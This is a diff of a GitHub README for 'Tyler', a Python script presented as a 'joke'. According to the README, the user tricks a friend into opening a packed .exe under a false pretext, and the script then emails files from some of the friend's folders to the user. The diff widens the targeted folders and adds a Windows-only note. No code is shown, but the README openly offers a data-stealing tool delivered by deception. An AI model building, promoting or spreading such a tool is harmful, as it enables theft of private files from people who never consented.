DENdidpip/Tyler/README.md

 # Tyler

 📁 **Tyler** — this is a Python script for a "joke".
-The idea of ​​the script is that you ask your friend to open an .exe file under the pretext that you wrote a cool thing, but here's the problem, the script sends you all the files from the your friend "Downloads" folder to your email (if you are interested in another folder, you can change it in the code).
+The idea of ​​the script is that you ask your friend to open an .exe file under the pretext that you wrote a cool thing, but here's the problem, the script sends you all the files from some your friend's folders to your email (if you are interested in another folder, you can change it in the code).
 The project is easy to run from the command line and can be packed using `pyinstaller`.

 ## 📦 Installation

+It will not work on Linux or MacOS

 Make sure you have Python 3.7+ installed and `pip`.